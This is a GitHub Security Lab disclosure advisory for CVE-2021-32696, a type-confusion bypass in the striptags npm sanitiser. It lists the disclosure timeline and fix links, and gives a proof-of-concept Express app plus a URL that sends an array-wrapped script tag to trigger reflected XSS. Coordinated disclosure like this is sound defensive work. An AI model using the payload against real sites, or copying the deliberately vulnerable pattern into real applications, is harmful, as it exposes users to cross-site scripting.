GHSL-2021-083: Type confusion in scripttag leads to XSS - CVE-2021-32696

Coordinated Disclosure Timeline

• 2021-05-21: Maintainer contacted
• 2021-06-18: Maintainer proposed a fix
• 2021-06-18: Vulnerability was addressed

Summary

A type-confusion vulnerability leads scriptags to incorrectly sanitize dangerous inputs when an attacker is able to send an array (instead of a string) to the striptags function.

Product

ericnorris/striptags

Tested Version

v3.1.1

Details

scriptags sanitizes input by iterating on each character in the input string, but if instead of supplying the sanitizer with a string, another iterable object (such as an array of strings) is passed, then the sanitizer fails to properly sanitize the input.

Proof of concept

The following proof of concept is an express application that mimics the situation in which an application would be vulnerable. To test the vulnerability open he following url in a browser:

http://localhost:3000/?name[]=Foo&name[]=%3Cscript%3Ealert(2)%3C/script%3E

const util = require('util');
const striptags = require('striptags');

// First a local demonstration of what type-confusion can do.
const html = "Hello <strong>World</strong>";
const confused = striptags([html], []); // Putting the HTML into an array confuses the striptags function
console.log("Type confused: " + util.inspect(confused)); // Prints "Hello <strong>World</strong>". 

// The below demonstrates how this vulnerablity could cause reflected XSS attacks.
const express = require("express");
const app = express();

// Parses the query parameters as JSON. This is actually quite common in web applications.
app.use(express.json());
app.use(express.urlencoded({
  extended: true
}));

app.get("/", function(req, res) {
  const name = req.query.name;
  console.log(util.inspect(name));
  const stripped = striptags(name, []);

  // This will render the following code on the browser:
  // `Hello Foo<script>alert(2)</script>!`
  res.send("Hello " + stripped + "!");
});

app.listen(3000, () => {
  console.log("Server started on port 3000");
});

Impact

XSS

CVE

• CVE-2021-32696

Resources

• https://github.com/ericnorris/striptags/security/advisories/GHSA-qxg5-2qff-p49r
• https://github.com/ericnorris/striptags/releases/tag/v3.2.0
• https://github.com/ericnorris/striptags/commit/f252a6b0819499cd65403707ebaf5cc925f2faca

Credit

This issue was discovered and reported by GitHub team member @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com, please include GHSL-2021-083 in any communication regarding this issue.